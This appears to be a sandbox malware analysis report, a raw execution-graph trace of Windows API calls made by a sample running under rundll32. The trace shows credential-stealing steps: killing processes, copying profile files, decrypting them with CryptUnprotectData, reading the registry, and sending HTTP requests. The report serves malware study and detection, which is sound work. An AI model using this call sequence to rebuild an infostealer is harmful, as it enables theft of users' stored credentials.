                                                                    [Control-flow Graph; legend: Executed / Not Executed]
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
                                                                    • String ID:
                                                                    • API String ID: 1596153048-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000003.2517442230.00007DF445320000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF445320000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_3_7df445320000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateSnapshotToolhelp32
                                                                    • String ID: @
                                                                    • API String ID: 3332741929-2766056989

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ExitThreadUser
                                                                    • String ID:
                                                                    • API String ID: 3424019298-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000003.2115172916.000002339FC40000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002339FC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_3_2339fc40000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000003.2115172916.000002339FC40000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002339FC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_3_2339fc40000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$HeapHttpOpenRequest$AllocateAvailableCloseConnectDataFreeHandleQuerySend
                                                                    • String ID:
                                                                    • API String ID: 3737532752-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000003.2517442230.00007DF445320000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF445320000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_3_7df445320000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 1083639309-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMutex
                                                                    • String ID:
                                                                    • API String ID: 1964310414-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcedure
                                                                    • String ID:
                                                                    • API String ID: 3653107232-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000003.2115172916.000002339FC40000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002339FC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_3_2339fc40000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:

                                                                    Execution Graph

                                                                    Execution Coverage:3.1%
                                                                    Dynamic/Decrypted Code Coverage:52%
                                                                    Signature Coverage:5.1%
                                                                    Total number of Nodes:1156
                                                                    Total number of Limit Nodes:42
30390f4 67426 3039106 67425->67426 67428 30382b4 NtFreeVirtualMemory 67425->67428 67429 3039118 InternetOpenUrlW 67426->67429 67430 30382b4 NtFreeVirtualMemory 67426->67430 67428->67426 67429->67424 67432 3039154 67429->67432 67430->67429 67431 303915f InternetReadFile 67431->67432 67432->67424 67432->67431 67433 303b388 NtAllocateVirtualMemory 67432->67433 67460 303b648 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 67432->67460 67433->67432 67435->67409 67436->67413 67437->67413 67439 3035614 67438->67439 67440 303b388 NtAllocateVirtualMemory 67439->67440 67441 303563a 67440->67441 67442 303b388 NtAllocateVirtualMemory 67441->67442 67443 3035650 InternetCrackUrlW 67442->67443 67444 30356ac 67443->67444 67446 30356c6 67443->67446 67445 30382b4 NtFreeVirtualMemory 67444->67445 67447 30356b9 67445->67447 67446->67424 67446->67425 67449 303c860 67446->67449 67448 30382b4 NtFreeVirtualMemory 67447->67448 67448->67446 67450 303c894 InternetConnectW 67449->67450 67451 303c8df 67449->67451 67450->67451 67454 303c8e4 HttpOpenRequestW 67450->67454 67452 303c9e0 67451->67452 67453 303c9d5 InternetCloseHandle 67451->67453 67456 303c9f3 67452->67456 67457 303c9e8 InternetCloseHandle 67452->67457 67453->67452 67454->67451 67455 303c936 HttpSendRequestW 67454->67455 67458 303c9a7 HttpSendRequestW 67455->67458 67459 303c955 InternetQueryOptionW InternetSetOptionW 67455->67459 67456->67425 67457->67456 67458->67451 67459->67458 67460->67432 67462 303bbc5 67461->67462 67463 303bb62 67461->67463 67464 303bb8e CreateFileMappingA 67463->67464 67464->67462 67465 303bbcc MapViewOfFile 67464->67465 67465->67462 67467 303bbff 67465->67467 67466 303bcd5 VirtualFree 67468 30382b4 NtFreeVirtualMemory 67466->67468 67467->67466 67469 303b388 NtAllocateVirtualMemory 67467->67469 67470 303bd06 UnmapViewOfFile CloseHandle 67468->67470 67471 303bc35 67469->67471 67470->67462 67472 303bc62 67471->67472 67473 303be64 3 API calls 67472->67473 67474 303bc87 67473->67474 67475 303be64 3 API 
calls 67474->67475 67476 303bc99 67475->67476 67477 303bfc0 NtAllocateVirtualMemory 67476->67477 67478 303bcaf 67477->67478 67479 30382b4 NtFreeVirtualMemory 67478->67479 67480 303bccb 67479->67480 67481 30382b4 NtFreeVirtualMemory 67480->67481 67481->67466 67483 3034411 67482->67483 67484 303bfc0 NtAllocateVirtualMemory 67483->67484 67487 3034444 67484->67487 67485 30344a4 67486 30382b4 NtFreeVirtualMemory 67485->67486 67488 3034451 67486->67488 67487->67485 67487->67488 67489 303448f MessageBoxA 67487->67489 67489->67485 67490 303922b 67491 303904b InternetOpenW 67490->67491 67505 3039086 67490->67505 67492 303908b 67491->67492 67491->67505 67495 30355dc 3 API calls 67492->67495 67493 3039248 67496 3039250 InternetCloseHandle 67493->67496 67497 303925b 67493->67497 67494 303923d InternetCloseHandle 67494->67493 67498 30390ca 67495->67498 67496->67497 67500 30390f4 67498->67500 67501 303c860 8 API calls 67498->67501 67498->67505 67499 3039106 67503 3039118 InternetOpenUrlW 67499->67503 67504 30382b4 NtFreeVirtualMemory 67499->67504 67500->67499 67502 30382b4 NtFreeVirtualMemory 67500->67502 67501->67500 67502->67499 67503->67505 67507 3039154 67503->67507 67504->67503 67505->67493 67505->67494 67506 303915f InternetReadFile 67506->67507 67507->67505 67507->67506 67508 303b388 NtAllocateVirtualMemory 67507->67508 67510 303b648 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 67507->67510 67508->67507 67510->67507 67511 e45579c 67512 e4557a5 67511->67512 67513 e4557aa 67511->67513 67515 e454b50 67512->67515 67516 e454b9e 67515->67516 67517 e454c66 67516->67517 67750 e4511d4 GetProcAddress 67516->67750 67518 e454c6d __free_lconv_num 67517->67518 67761 e454948 CreateToolhelp32Snapshot 67517->67761 67518->67513 67522 e455037 67774 e456e54 67522->67774 67526 e454bfd 67526->67517 67751 e45189c GetProcAddress 67526->67751 67528 e455067 67531 e453cc0 21 API calls 67528->67531 67530 e454c06 67530->67517 67752 e4516f4 67530->67752 67532 e455084 67531->67532 67534 
e453cc0 21 API calls 67532->67534 67536 e4550a5 67534->67536 67798 e45437c 67536->67798 67538 e4550b9 67540 e45437c 21 API calls 67538->67540 67542 e4550ca 67540->67542 67541 e454c13 67541->67517 67544 e454c62 67541->67544 67981 e45163c GetProcAddress 67541->67981 67805 e4571ac 67542->67805 67544->67517 67545 e4550ea 67824 e453c14 67545->67824 67547 e4550f9 67548 e453c14 21 API calls 67547->67548 67549 e45510a 67548->67549 67550 e453c14 21 API calls 67549->67550 67551 e45511b 67550->67551 67552 e453c14 21 API calls 67551->67552 67553 e45512b 67552->67553 67554 e453c14 21 API calls 67553->67554 67555 e45513b 67554->67555 67848 e456ed8 67555->67848 67559 e45515a 67560 e454a90 3 API calls 67559->67560 67561 e455177 67560->67561 67866 e456f6c 67561->67866 67563 e45517f 67872 e456e2c GetProcessHeap HeapAlloc 67563->67872 67565 e455184 67566 e456e54 3 API calls 67565->67566 67567 e455193 67566->67567 67873 e4575f8 67567->67873 67569 e4551a2 67883 e457c00 SHGetFolderPathA 67569->67883 67574 e456ed8 3 API calls 67575 e4551c8 67574->67575 67576 e454a90 3 API calls 67575->67576 67577 e4551df 67576->67577 67578 e454a90 3 API calls 67577->67578 67579 e4551f5 67578->67579 67580 e456f6c 2 API calls 67579->67580 67581 e4551fd 67580->67581 67895 e456e2c GetProcessHeap HeapAlloc 67581->67895 67583 e455202 67584 e456e54 3 API calls 67583->67584 67585 e455211 67584->67585 67586 e4575f8 13 API calls 67585->67586 67587 e455220 67586->67587 67896 e45842c SHGetFolderPathA 67587->67896 67590 e45842c 52 API calls 67591 e455234 67590->67591 67592 e457680 3 API calls 67591->67592 67593 e45523c 67592->67593 67594 e456ed8 3 API calls 67593->67594 67595 e455244 67594->67595 67596 e454a90 3 API calls 67595->67596 67597 e45525b 67596->67597 67598 e454a90 3 API calls 67597->67598 67599 e455271 67598->67599 67600 e456f6c 2 API calls 67599->67600 67601 e455279 67600->67601 67911 e456e2c GetProcessHeap HeapAlloc 67601->67911 67603 e45527e 67604 e456e54 3 API calls 67603->67604 67605 e45528d 
67604->67605 67606 e4575f8 13 API calls 67605->67606 67607 e45529c 67606->67607 67912 e458848 RegOpenKeyExA 67607->67912 67611 e4552ac 67612 e457680 3 API calls 67611->67612 67613 e4552b4 67612->67613 67614 e456ed8 3 API calls 67613->67614 67615 e4552bc 67614->67615 67616 e454a90 3 API calls 67615->67616 67617 e4552d3 67616->67617 67618 e454a90 3 API calls 67617->67618 67619 e4552e9 67618->67619 67620 e456f6c 2 API calls 67619->67620 67621 e4552f1 67620->67621 67945 e456e2c GetProcessHeap HeapAlloc 67621->67945 67623 e4552f6 67624 e456e54 3 API calls 67623->67624 67625 e455305 67624->67625 67626 e4575f8 13 API calls 67625->67626 67627 e455314 67626->67627 67628 e457c00 37 API calls 67627->67628 67629 e45532a 67628->67629 67630 e457680 3 API calls 67629->67630 67631 e455332 67630->67631 67632 e456ed8 3 API calls 67631->67632 67633 e45533a 67632->67633 67634 e454a90 3 API calls 67633->67634 67635 e455351 67634->67635 67636 e454a90 3 API calls 67635->67636 67637 e455367 67636->67637 67638 e456f6c 2 API calls 67637->67638 67639 e45536f 67638->67639 67946 e456e2c GetProcessHeap HeapAlloc 67639->67946 67641 e455374 67642 e456e54 3 API calls 67641->67642 67643 e455383 67642->67643 67644 e4575f8 13 API calls 67643->67644 67645 e455392 67644->67645 67947 e45453c lstrcpyA lstrcatA RegOpenKeyExA 67645->67947 67647 e4553ac 67648 e4553b1 wsprintfA 67647->67648 67650 e4553da 67647->67650 67649 e45453c 23 API calls 67648->67649 67649->67647 67651 e4553f1 67650->67651 67653 e457680 3 API calls 67650->67653 67652 e457680 3 API calls 67651->67652 67654 e4553f9 67652->67654 67655 e4553e9 67653->67655 67656 e456ed8 3 API calls 67654->67656 67657 e457680 3 API calls 67655->67657 67658 e455401 67656->67658 67657->67651 67659 e454a90 3 API calls 67658->67659 67660 e455418 67659->67660 67661 e454a90 3 API calls 67660->67661 67662 e45542e 67661->67662 67663 e456f6c 2 API calls 67662->67663 67664 e455436 67663->67664 67964 e456e2c GetProcessHeap HeapAlloc 67664->67964 67666 e45543b 67667 
e456e54 3 API calls 67666->67667 67668 e45544a 67667->67668 67669 e4575f8 13 API calls 67668->67669 67670 e455459 67669->67670 67965 e455abc SHGetFolderPathA 67670->67965 67673 e457680 3 API calls 67674 e455477 67673->67674 67675 e456ed8 3 API calls 67674->67675 67676 e45547f 67675->67676 67677 e454a90 3 API calls 67676->67677 67678 e455496 67677->67678 67679 e454a90 3 API calls 67678->67679 67680 e4554ac 67679->67680 67681 e456f6c 2 API calls 67680->67681 67682 e4554b4 67681->67682 67971 e456e2c GetProcessHeap HeapAlloc 67682->67971 67684 e4554b9 67685 e456e54 3 API calls 67684->67685 67686 e4554c8 67685->67686 67687 e4575f8 13 API calls 67686->67687 67688 e4554d7 SHGetFolderPathA 67687->67688 67689 e455537 67688->67689 67690 e4554fd lstrcatA 67688->67690 67692 e457680 3 API calls 67689->67692 67982 e456604 lstrcpyA lstrlenA 67690->67982 67693 e45553f 67692->67693 67694 e456ed8 3 API calls 67693->67694 67695 e455547 67694->67695 67696 e454a90 3 API calls 67695->67696 67697 e45555e 67696->67697 67698 e454a90 3 API calls 67697->67698 67699 e455574 67698->67699 67700 e456f6c 2 API calls 67699->67700 67701 e45557c 67700->67701 67972 e456e2c GetProcessHeap HeapAlloc 67701->67972 67703 e455581 67704 e456e54 3 API calls 67703->67704 67705 e455590 67704->67705 67706 e4575f8 13 API calls 67705->67706 67707 e45559f 67706->67707 67973 e455d94 SHGetFolderPathA 67707->67973 67710 e457680 3 API calls 67711 e4555af 67710->67711 67712 e456ed8 3 API calls 67711->67712 67713 e4555b7 67712->67713 67714 e454a90 3 API calls 67713->67714 67715 e4555ce 67714->67715 67716 e454a90 3 API calls 67715->67716 67717 e4555e4 67716->67717 67718 e456f6c 2 API calls 67717->67718 67719 e4555ec 67718->67719 67980 e456e2c GetProcessHeap HeapAlloc 67719->67980 67721 e4555f1 67722 e456e54 3 API calls 67721->67722 67723 e455600 67722->67723 67724 e4575f8 13 API calls 67723->67724 67725 e45560f 67724->67725 67726 e455abc 37 API calls 67725->67726 67727 e455625 67726->67727 67728 e457680 3 API calls 
67727->67728 67729 e45562d 67728->67729 67730 e456ed8 3 API calls 67729->67730 67731 e455635 67730->67731 67732 e454a90 3 API calls 67731->67732 67733 e45564c 67732->67733 67734 e454a90 3 API calls 67733->67734 67735 e455662 67734->67735 67736 e456f6c 2 API calls 67735->67736 67737 e45566a 67736->67737 67737->67518 67738 e455690 GetProcessHeap HeapAlloc 67737->67738 67739 e455688 67737->67739 67738->67739 67743 e4556b4 wcsftime 67738->67743 67740 e455756 GetProcessHeap 67739->67740 67741 e45576a __free_lconv_num 67739->67741 67740->67741 67741->67518 67742 e45576f GetProcessHeap 67741->67742 67742->67518 67744 e4556e2 OpenFileMappingA 67743->67744 67745 e455701 MapViewOfFile UnmapViewOfFile CloseHandle 67744->67745 67746 e455733 67744->67746 67745->67746 67996 e454824 32 API calls wprintf 67746->67996 67748 e455742 67997 e454878 29 API calls wprintf 67748->67997 67750->67526 67751->67530 67755 e451754 memcpy_s 67752->67755 67753 e45117c GetSystemDirectoryW NtAllocateVirtualMemory 67753->67755 67754 e451872 67754->67517 67754->67541 67755->67753 67755->67754 67755->67755 67757 e4517e8 FindFirstFileW 67755->67757 67759 e451827 FindNextFileW 67755->67759 67760 e45183b LoadLibraryW 67755->67760 67998 e4524c0 67755->67998 68008 e45248c 67755->68008 67757->67755 67759->67755 67760->67755 67762 e45497c Process32First 67761->67762 67763 e454a6f 67761->67763 67764 e454a66 CloseHandle 67762->67764 67765 e45499a __security_init_cookie 67762->67765 67773 e456e2c GetProcessHeap HeapAlloc 67763->67773 67764->67763 67766 e454a50 Process32Next 67765->67766 67767 e4549c2 OpenProcess 67765->67767 67766->67764 67766->67765 67767->67766 67768 e4549d7 StrStrIA StrStrIA StrStrIA 67767->67768 67769 e454a33 67768->67769 67770 e454a3c TerminateProcess 67768->67770 67769->67770 67771 e454a38 67769->67771 67772 e454a47 CloseHandle 67770->67772 67771->67770 67771->67772 67772->67766 67773->67522 67775 e456e71 67774->67775 67776 e455046 67774->67776 67777 e456e95 67775->67777 67778 e456e82 
67775->67778 67787 e453cc0 67776->67787 67779 e456eb1 67777->67779 67785 e456e9a 67777->67785 68013 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67778->68013 68016 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67779->68016 67783 e456ec0 67783->67776 67784 e456e8a 68014 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67784->68014 67785->67779 68015 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67785->68015 67789 e453cda 67787->67789 67788 e453d3b 67790 e453d41 67788->67790 67791 e453dbf 67788->67791 67789->67788 67792 e453d14 67789->67792 67797 e453d36 memcpy_s 67790->67797 68018 e4540ac 21 API calls new 67790->68018 68019 e4d5280 10 API calls 2 library calls 67791->68019 68017 e453dcc 10 API calls std::_Xinvalid_argument 67792->68017 67797->67528 67799 e45439e 67798->67799 67800 e4543b9 67798->67800 67799->67800 67801 e4543ac 67799->67801 68021 e453ef4 67800->68021 68020 e4543e0 21 API calls 2 library calls 67801->68020 67804 e4543b7 67804->67538 67806 e4571f2 67805->67806 67807 e4571eb __free_lconv_num 67805->67807 67808 e4571f7 67806->67808 67809 e45721d 67806->67809 67807->67545 68030 e456830 5 API calls __free_lconv_num 67808->68030 67810 e457267 67809->67810 67814 e457214 67809->67814 68032 e4570a0 7 API calls 67810->68032 67814->67807 67814->67809 68031 e456830 5 API calls __free_lconv_num 67814->68031 67815 e45723f 67817 e457243 67815->67817 67818 e45725e 67815->67818 67816 e457278 67819 e457293 __free_lconv_num 67816->67819 67820 e45727f GetProcessHeap 67816->67820 67817->67807 67821 e457248 GetProcessHeap 67817->67821 67818->67810 67819->67807 67822 e457298 GetProcessHeap 67819->67822 67820->67819 67823 e45725c __free_lconv_num 67821->67823 67822->67807 67823->67807 67825 e453c2d memcpy_s 67824->67825 67835 e453c71 67824->67835 67826 e453ca6 67825->67826 67827 e453c59 67825->67827 67825->67835 68033 e4e1fcc 19 API calls _invalid_parameter_noinfo_noreturn 67826->68033 67828 e453c62 67827->67828 67829 e453cab 67827->67829 67832 e453cb1 67828->67832 67833 e453c6b 
67828->67833 68034 e4e1fcc 19 API calls _invalid_parameter_noinfo_noreturn 67829->68034 68035 e4e1fcc 19 API calls _invalid_parameter_noinfo_noreturn 67832->68035 67833->67835 67836 e453cb7 67833->67836 67835->67547 68036 e4e1fcc 19 API calls _invalid_parameter_noinfo_noreturn 67836->68036 67849 e456eee 67848->67849 67850 e455143 67848->67850 67851 e456f40 67849->67851 68037 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67849->68037 67860 e454a90 67850->67860 68040 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67851->68040 67854 e456f14 68038 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67854->68038 67855 e456f4d 67855->67850 68041 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67855->68041 67857 e456f21 67857->67851 68039 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67857->68039 67861 e454abd 67860->67861 67861->67861 67862 e454ae0 GetProcessHeap 67861->67862 67863 e454adb memcpy_s 67861->67863 67864 e454af3 HeapReAlloc 67862->67864 67865 e454b02 HeapAlloc 67862->67865 67863->67559 67864->67863 67865->67863 67867 e456f71 67866->67867 67871 e456fb4 __free_lconv_num 67866->67871 67868 e456f87 GetProcessHeap 67867->67868 67869 e456fa0 GetProcessHeap 67867->67869 67870 e456f9b __free_lconv_num 67868->67870 67869->67871 67870->67869 67871->67563 67872->67565 67874 e45761d 67873->67874 67881 e457619 __free_lconv_num 67873->67881 67875 e457622 67874->67875 67876 e457648 67874->67876 68042 e456830 5 API calls __free_lconv_num 67875->68042 68043 e45750c 7 API calls 67876->68043 67879 e457656 67879->67881 67882 e45765d GetProcessHeap 67879->67882 67880 e45763f 67880->67876 67880->67881 67881->67569 67882->67881 67884 e457c4c lstrcatA lstrlenA 67883->67884 67885 e4551b8 67883->67885 67884->67885 67886 e457c73 67884->67886 67889 e457680 67885->67889 67886->67885 67887 e457c7d lstrcpyA lstrcpyA lstrcatA lstrlenA lstrcpyA 67886->67887 68044 e457a88 67887->68044 67890 e457692 67889->67890 67891 e4551c0 67889->67891 68087 e4569d8 GetProcessHeap HeapReAlloc HeapAlloc 67890->68087 
67891->67574 67894 e4576d3 67894->67891 67895->67583 67897 e458470 lstrcatA 67896->67897 67904 e45522a 67896->67904 67898 e4584c0 67897->67898 67899 e458499 67897->67899 68088 e453698 67898->68088 67901 e456604 15 API calls 67899->67901 67902 e4584be 67901->67902 67902->67904 67906 e457680 3 API calls 67902->67906 67904->67590 67905 e456604 15 API calls 67909 e4584ee 67905->67909 67907 e458544 67906->67907 67908 e457680 3 API calls 67907->67908 67908->67904 67909->67902 67910 e458526 FreeLibrary 67909->67910 67910->67902 67911->67603 67913 e4552a4 67912->67913 67914 e45888f CoInitialize CoCreateInstance 67912->67914 67929 e4589e4 67913->67929 67915 e4589c2 RegCloseKey 67914->67915 67916 e4588c2 67914->67916 67915->67913 67916->67915 67918 e4588cf 67916->67918 67917 e458986 RegCloseKey 67920 e4589bb 67917->67920 67921 e4589ab 67917->67921 67918->67917 67924 e45892c StrStrIW 67918->67924 68187 e458568 23 API calls 67918->68187 67920->67913 67922 e457680 3 API calls 67921->67922 67923 e4589b3 67922->67923 67925 e457680 3 API calls 67923->67925 67924->67918 67925->67920 67927 e458952 CoTaskMemFree 67927->67918 67928 e458965 CoTaskMemFree 67927->67928 67928->67918 67930 e458a14 LoadLibraryA 67929->67930 67943 e458b1e 67929->67943 67931 e458a2d 6 API calls 67930->67931 67934 e458b08 67930->67934 67932 e458aff FreeLibrary 67931->67932 67933 e458aca 67931->67933 67932->67934 67933->67932 67935 e458af3 67933->67935 67934->67611 67935->67943 67936 e458d00 67936->67934 67937 e457680 3 API calls 67936->67937 67938 e458d10 67937->67938 67939 e457680 3 API calls 67938->67939 67939->67934 67942 e4570a0 7 API calls 67942->67943 67943->67934 67943->67936 67943->67942 67944 e457680 3 API calls 67943->67944 68188 e4548cc 7 API calls 67943->68188 68189 e45750c 7 API calls 67943->68189 67944->67943 67945->67623 67946->67641 67948 e4545a6 67947->67948 67949 e4545ad RegEnumKeyExA 67947->67949 67948->67647 67950 e4547f5 RegCloseKey 67949->67950 67958 e4545f6 67949->67958 67950->67948 
67951 e454606 RegOpenKeyExA 67952 e4547ad RegEnumKeyExA 67951->67952 67951->67958 67952->67950 67952->67958 67953 e457680 3 API calls 67955 e4547a2 RegCloseKey 67953->67955 67954 e454648 lstrcpyW RegQueryValueExW 67954->67958 67955->67952 67958->67951 67958->67952 67958->67953 67958->67954 67958->67955 67960 e454714 CryptUnprotectData 67958->67960 68190 e4548cc 7 API calls 67958->68190 68191 e45750c 7 API calls 67958->68191 68192 e4570a0 7 API calls 67958->68192 68193 e457474 11 API calls 67958->68193 68194 e4570a0 7 API calls 67958->68194 67960->67958 67963 e454779 LocalFree 67963->67958 67964->67666 67966 e45546f 67965->67966 67967 e455b08 lstrcatA lstrlenA 67965->67967 67966->67673 67967->67966 67968 e455b2f 67967->67968 67968->67966 67969 e455b39 lstrcpyA lstrcpyA lstrcatA lstrlenA lstrcpyA 67968->67969 68195 e455944 67969->68195 67971->67684 67972->67703 67974 e455dc0 67973->67974 67975 e455ded SHGetFolderPathA 67973->67975 67976 e456604 15 API calls 67974->67976 67977 e455e0d lstrcatA 67975->67977 67978 e4555a7 67975->67978 67976->67975 67979 e456604 15 API calls 67977->67979 67978->67710 67979->67978 67980->67721 67981->67541 67983 e456651 lstrcatA 67982->67983 67984 e456668 lstrcatA FindFirstFileA 67982->67984 67983->67984 67985 e456696 67984->67985 67986 e456822 67984->67986 67987 e45679c lstrcpyA 67985->67987 67988 e45678a StrStrIA 67985->67988 67989 e4566c6 lstrcpyA 67985->67989 67990 e456804 FindNextFileA 67985->67990 67995 e456819 FindClose 67985->67995 67986->67689 67991 e4567c4 lstrcatA 67987->67991 67992 e4567b2 lstrcatA 67987->67992 67988->67987 67988->67990 67993 e4566dc lstrcatA 67989->67993 67994 e4566ee lstrcatA lstrcatA 67989->67994 67990->67985 67990->67995 67991->67985 67992->67991 67993->67994 67994->67985 67995->67986 67996->67748 67997->67739 67999 e4524f1 67998->67999 68000 e4524e0 67998->68000 68002 e452513 67999->68002 68003 e4524fd VirtualQuery 67999->68003 68001 e45248c NtFreeVirtualMemory 68000->68001 68005 e4524e8 68001->68005 
68004 e452522 68002->68004 68011 e45241c NtAllocateVirtualMemory 68002->68011 68003->68002 68004->68005 68007 e45248c NtFreeVirtualMemory 68004->68007 68005->67755 68007->68005 68009 e452491 NtFreeVirtualMemory 68008->68009 68010 e4524bc 68008->68010 68009->68010 68010->67755 68012 e45245a memcpy_s 68011->68012 68012->68004 68013->67784 68014->67777 68015->67785 68016->67783 68020->67804 68022 e453fe9 68021->68022 68029 e4d52a4 10 API calls 2 library calls 68022->68029 68030->67814 68031->67815 68032->67816 68037->67854 68038->67857 68039->67857 68040->67855 68041->67850 68042->67880 68043->67879 68045 e457708 6 API calls 68044->68045 68046 e457ab5 CopyFileA 68045->68046 68047 e457ae2 68046->68047 68048 e457aca wcsftime 68046->68048 68047->68048 68061 e455e5c 68047->68061 68048->67886 68050 e457b06 68050->68048 68051 e457b67 68050->68051 68052 e457b31 GetProcessHeap HeapAlloc 68050->68052 68054 e4a7ee8 CloseHandle 68051->68054 68052->68051 68053 e457b51 68052->68053 68053->68051 68055 e457b99 68054->68055 68056 e457bb6 GetProcessHeap 68055->68056 68057 e457ba2 GetProcessHeap 68055->68057 68059 e457bca __free_lconv_num 68056->68059 68075 e4f5180 68057->68075 68060 e457bd8 DeleteFileA 68059->68060 68060->68048 68077 e456500 CreateFileA 68061->68077 68064 e455e85 __free_lconv_num 68064->68050 68065 e455e92 StrStrIA 68066 e455fb5 GetProcessHeap 68065->68066 68067 e455eaf StrChrA 68065->68067 68066->68064 68067->68066 68068 e455eca 68067->68068 68068->68066 68069 e455f01 CryptUnprotectData 68068->68069 68069->68066 68070 e455f38 GetProcessHeap HeapAlloc 68069->68070 68070->68066 68071 e455f58 68070->68071 68072 e455fa1 LocalFree 68071->68072 68073 e455f6a GetProcessHeap HeapAlloc 68071->68073 68072->68066 68073->68072 68074 e455f8a 68073->68074 68074->68072 68076 e4f5182 68075->68076 68078 e456551 GetFileSize 68077->68078 68079 e455e81 68077->68079 68080 e45656b GetProcessHeap HeapAlloc 68078->68080 68083 e456565 __free_lconv_num 68078->68083 68079->68064 68079->68065 
68082 e45658f 68080->68082 68080->68083 68081 e4565e3 CloseHandle 68081->68079 68084 e45659e ReadFile 68082->68084 68085 e45659a 68082->68085 68083->68081 68084->68085 68085->68081 68086 e4565cf GetProcessHeap 68085->68086 68086->68083 68087->67894 68121 e45343c 68088->68121 68090 e4536bc 68091 e4537ae 68090->68091 68095 e453cc0 21 API calls 68090->68095 68152 e4541d0 68091->68152 68097 e4536fb 68095->68097 68096 e453c14 21 API calls 68098 e4537ea 68096->68098 68099 e4541d0 21 API calls 68097->68099 68100 e4538f0 68098->68100 68101 e4537fa 7 API calls 68098->68101 68102 e453710 68099->68102 68105 e453c14 21 API calls 68100->68105 68101->68100 68103 e4538b9 68101->68103 68165 e454340 10 API calls 68102->68165 68103->68100 68107 e4538fe 68105->68107 68106 e453721 68108 e453c14 21 API calls 68106->68108 68107->67902 68107->67905 68109 e453730 68108->68109 68110 e453cc0 21 API calls 68109->68110 68111 e45374f 68110->68111 68166 e454340 10 API calls 68111->68166 68113 e453761 68114 e453c14 21 API calls 68113->68114 68115 e453781 68114->68115 68116 e453c14 21 API calls 68115->68116 68117 e453790 68116->68117 68118 e453c14 21 API calls 68117->68118 68119 e45379f 68118->68119 68120 e453c14 21 API calls 68119->68120 68120->68091 68122 e453cc0 21 API calls 68121->68122 68123 e45348f SHGetValueA 68122->68123 68124 e4534d5 68123->68124 68128 e453653 68123->68128 68125 e453cc0 21 API calls 68124->68125 68126 e4534f2 68125->68126 68127 e4541d0 21 API calls 68126->68127 68129 e453508 68127->68129 68130 e453c14 21 API calls 68128->68130 68131 e45437c 21 API calls 68129->68131 68132 e45367c 68130->68132 68133 e45351a 